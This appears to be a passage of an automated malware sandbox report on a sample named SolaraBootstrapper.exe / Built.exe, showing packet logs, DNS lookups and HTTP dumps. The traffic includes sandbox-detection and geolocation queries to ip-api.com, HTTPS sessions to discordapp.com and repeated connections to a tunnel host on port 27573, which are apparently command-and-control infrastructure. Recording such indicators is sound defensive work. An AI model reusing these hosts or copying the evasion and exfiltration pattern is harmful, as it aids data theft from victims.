                                                                    Aug 5, 2024 14:32:36.263147116 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.263226032 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.263250113 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.263447046 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.263477087 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.263607025 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.263641119 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.263770103 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.263787985 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.263801098 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.263811111 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.263819933 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.263823986 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.263904095 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.263912916 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.263925076 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.263936043 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.263993025 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264000893 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264014959 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264023066 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264080048 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264086008 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264103889 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264116049 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264152050 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264163971 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264182091 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264192104 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264245033 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264256001 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264266968 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264282942 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264302015 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264326096 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264334917 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264384985 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264394999 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264414072 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264424086 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264461994 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264472961 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.264537096 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264599085 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264616013 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264646053 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.264703035 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273504972 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.273686886 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273703098 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.273719072 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273736000 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273756027 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273775101 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273797035 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273807049 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273859978 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273880005 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273910999 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.273961067 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.278418064 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.278584003 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.278601885 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:36.278616905 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.278641939 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.278656960 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.278671980 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.278683901 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:36.279329062 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:37.103621006 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:37.103770971 CEST44349744162.159.135.233192.168.2.4
                                                                    Aug 5, 2024 14:32:37.103888988 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:37.104682922 CEST49744443192.168.2.4162.159.135.233
                                                                    Aug 5, 2024 14:32:38.101581097 CEST4974380192.168.2.4208.95.112.1
                                                                    Aug 5, 2024 14:32:38.107182026 CEST8049743208.95.112.1192.168.2.4
                                                                    Aug 5, 2024 14:32:38.107259035 CEST4974380192.168.2.4208.95.112.1
                                                                    Aug 5, 2024 14:32:45.694966078 CEST4974527573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:32:45.700442076 CEST2757349745147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:32:45.700520992 CEST4974527573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:32:45.847451925 CEST4974527573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:32:45.852427959 CEST2757349745147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:32:59.511298895 CEST4974527573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:32:59.516138077 CEST2757349745147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:07.095597982 CEST2757349745147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:07.095688105 CEST4974527573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:08.891120911 CEST4974527573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:08.892698050 CEST4974827573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:08.896039009 CEST2757349745147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:08.897701025 CEST2757349748147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:08.897763968 CEST4974827573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:08.936611891 CEST4974827573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:08.941490889 CEST2757349748147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:21.110171080 CEST4974827573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:21.115237951 CEST2757349748147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:30.264381886 CEST2757349748147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:30.264575005 CEST4974827573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:30.672528982 CEST4974827573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:30.675652027 CEST4975127573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:30.747698069 CEST2757349748147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:30.747718096 CEST2757349751147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:30.747875929 CEST4975127573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:30.923691034 CEST4975127573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:31.053883076 CEST2757349751147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:42.813530922 CEST4975127573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:42.818476915 CEST2757349751147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:46.485090017 CEST4975127573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:46.490797043 CEST2757349751147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:50.844682932 CEST4975127573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:50.850292921 CEST2757349751147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:53.047750950 CEST4975127573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:53.328531981 CEST4975127573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:53.401582003 CEST2757349751147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:53.401640892 CEST4975127573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:53.402853012 CEST2757349751147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:53.402888060 CEST4975127573192.168.2.4147.185.221.21
                                                                    Aug 5, 2024 14:33:53.405411959 CEST2757349751147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:53.405441046 CEST2757349751147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:53.407614946 CEST2757349751147.185.221.21192.168.2.4
                                                                    Aug 5, 2024 14:33:53.408375978 CEST2757349751147.185.221.21192.168.2.4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Aug 5, 2024 14:32:05.788902998 CEST5156953192.168.2.41.1.1.1
                                                                    Aug 5, 2024 14:32:05.799179077 CEST53515691.1.1.1192.168.2.4
                                                                    Aug 5, 2024 14:32:07.258994102 CEST6366253192.168.2.41.1.1.1
                                                                    Aug 5, 2024 14:32:07.271002054 CEST53636621.1.1.1192.168.2.4
                                                                    Aug 5, 2024 14:32:07.342242956 CEST6181253192.168.2.41.1.1.1
                                                                    Aug 5, 2024 14:32:07.350220919 CEST53618121.1.1.1192.168.2.4
                                                                    Aug 5, 2024 14:32:09.863554001 CEST5449553192.168.2.41.1.1.1
                                                                    Aug 5, 2024 14:32:09.870932102 CEST53544951.1.1.1192.168.2.4
                                                                    Aug 5, 2024 14:32:34.534780025 CEST6423353192.168.2.41.1.1.1
                                                                    Aug 5, 2024 14:32:34.706140995 CEST53642331.1.1.1192.168.2.4
                                                                    Aug 5, 2024 14:32:35.568248987 CEST6352053192.168.2.41.1.1.1
                                                                    Aug 5, 2024 14:32:35.707571030 CEST53635201.1.1.1192.168.2.4
                                                                    Aug 5, 2024 14:32:45.651902914 CEST6352753192.168.2.41.1.1.1
                                                                    Aug 5, 2024 14:32:45.687215090 CEST53635271.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Aug 5, 2024 14:32:05.788902998 CEST192.168.2.41.1.1.10x395Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:07.258994102 CEST192.168.2.41.1.1.10x6034Standard query (0)blank-curro.inA (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:07.342242956 CEST192.168.2.41.1.1.10xd23aStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:09.863554001 CEST192.168.2.41.1.1.10xa706Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:34.534780025 CEST192.168.2.41.1.1.10xf932Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:35.568248987 CEST192.168.2.41.1.1.10xe1bcStandard query (0)discordapp.comA (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:45.651902914 CEST192.168.2.41.1.1.10x954cStandard query (0)cash-spoken.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Aug 5, 2024 14:32:05.799179077 CEST1.1.1.1192.168.2.40x395No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:07.271002054 CEST1.1.1.1192.168.2.40x6034Name error (3)blank-curro.innonenoneA (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:07.350220919 CEST1.1.1.1192.168.2.40xd23aNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:07.350220919 CEST1.1.1.1192.168.2.40xd23aNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:07.350220919 CEST1.1.1.1192.168.2.40xd23aNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:07.350220919 CEST1.1.1.1192.168.2.40xd23aNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:09.870932102 CEST1.1.1.1192.168.2.40xa706No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:34.706140995 CEST1.1.1.1192.168.2.40xf932No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:35.707571030 CEST1.1.1.1192.168.2.40xe1bcNo error (0)discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:35.707571030 CEST1.1.1.1192.168.2.40xe1bcNo error (0)discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:35.707571030 CEST1.1.1.1192.168.2.40xe1bcNo error (0)discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:35.707571030 CEST1.1.1.1192.168.2.40xe1bcNo error (0)discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:35.707571030 CEST1.1.1.1192.168.2.40xe1bcNo error (0)discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                    Aug 5, 2024 14:32:45.687215090 CEST1.1.1.1192.168.2.40x954cNo error (0)cash-spoken.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false
                                                                    • github.com
                                                                    • raw.githubusercontent.com
                                                                    • discordapp.com
                                                                    • ip-api.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449734208.95.112.1806252C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 5, 2024 14:32:09.881181955 CEST117OUTGET /line/?fields=hosting HTTP/1.1
                                                                    Host: ip-api.com
                                                                    Accept-Encoding: identity
                                                                    User-Agent: python-urllib3/2.2.2
                                                                    Aug 5, 2024 14:32:10.346529961 CEST175INHTTP/1.1 200 OK
                                                                    Date: Mon, 05 Aug 2024 12:32:09 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Content-Length: 6
                                                                    Access-Control-Allow-Origin: *
                                                                    X-Ttl: 60
                                                                    X-Rl: 44
                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                    Data Ascii: false


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449743208.95.112.1806252C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 5, 2024 14:32:34.721105099 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                                    Host: ip-api.com
                                                                    Accept-Encoding: identity
                                                                    User-Agent: python-urllib3/2.2.2
                                                                    Aug 5, 2024 14:32:35.260183096 CEST379INHTTP/1.1 200 OK
                                                                    Date: Mon, 05 Aug 2024 12:32:34 GMT
                                                                    Content-Type: application/json; charset=utf-8
                                                                    Content-Length: 202
                                                                    Access-Control-Allow-Origin: *
                                                                    X-Ttl: 35
                                                                    X-Rl: 43
                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                    Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449730140.82.121.44437248C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-08-05 12:32:06 UTC105OUTGET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                                                                    Host: github.com
                                                                    Connection: Keep-Alive
                                                                    2024-08-05 12:32:07 UTC473INHTTP/1.1 404 Not Found
                                                                    Server: GitHub.com
                                                                    Date: Mon, 05 Aug 2024 12:32:06 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                    Cache-Control: no-cache
                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                    X-Frame-Options: deny
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 0
                                                                    Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                    2024-08-05 12:32:07 UTC3192INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                    2024-08-05 12:32:07 UTC445INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65
                                                                    Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pre
                                                                    2024-08-05 12:32:07 UTC1370INData Raw: 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 20 20 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22
                                                                    Data Ascii: "> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="
                                                                    2024-08-05 12:32:07 UTC1370INData Raw: 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 37 39 62 63 61 37 31 34 35 33 39 33 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 66 65 34 31 33 37 62 35 34 62 32 36 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22
                                                                    Data Ascii: igh_contrast-79bca7145393.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css" /><link data-color-theme="dark_tritanopia"
                                                                    2024-08-05 12:32:07 UTC1370INData Raw: 22 2c 22 68 6f 76 65 72 63 61 72 64 5f 61 63 63 65 73 73 69 62 69 6c 69 74 79 22 2c 22 68 6f 76 65 72 63 61 72 64 5f 6c 6f 6e 67 65 72 5f 61 63 74 69 76 61 74 65 5f 74 69 6d 65 6f 75 74 22 2c 22 6d 61 72 6b 65 74 69 6e 67 5f 70 61 67 65 73 5f 73 65 61 72 63 68 5f 65 78 70 6c 6f 72 65 5f 70 72 6f 76 69 64 65 72 22 2c 22 72 65 6d 6f 76 65 5f 63 68 69 6c 64 5f 70 61 74 63 68 22 2c 22 73 61 6d 70 6c 65 5f 6e 65 74 77 6f 72 6b 5f 63 6f 6e 6e 5f 74 79 70 65 22 2c 22 73 69 74 65 5f 6d 65 74 65 72 65 64 5f 62 69 6c 6c 69 6e 67 5f 75 70 64 61 74 65 22 2c 22 74 75 72 62 6f 5f 65 78 70 65 72 69 6d 65 6e 74 5f 72 69 73 6b 79 22 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66
                                                                    Data Ascii: ","hovercard_accessibility","hovercard_longer_activate_timeout","marketing_pages_search_explore_provider","remove_child_patch","sample_network_conn_type","site_metered_billing_update","turbo_experiment_risky"]}</script><script crossorigin="anonymous" def
                                                                    2024-08-05 12:32:07 UTC282INData Raw: 2d 66 36 39 30 66 64 39 61 65 33 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 66 6f 63 75 73 2d 7a 6f 6e 65 5f 6a 73 2d 63 39 30 38 36 61 34 66 62 36 32 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e
                                                                    Data Ascii: -f690fd9ae3d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-c9086a4fb62b.js"></script><script crossorigin
                                                                    2024-08-05 12:32:07 UTC1370INData Raw: 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 66 39 62 39 35 38 66 35 66 32 64 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67
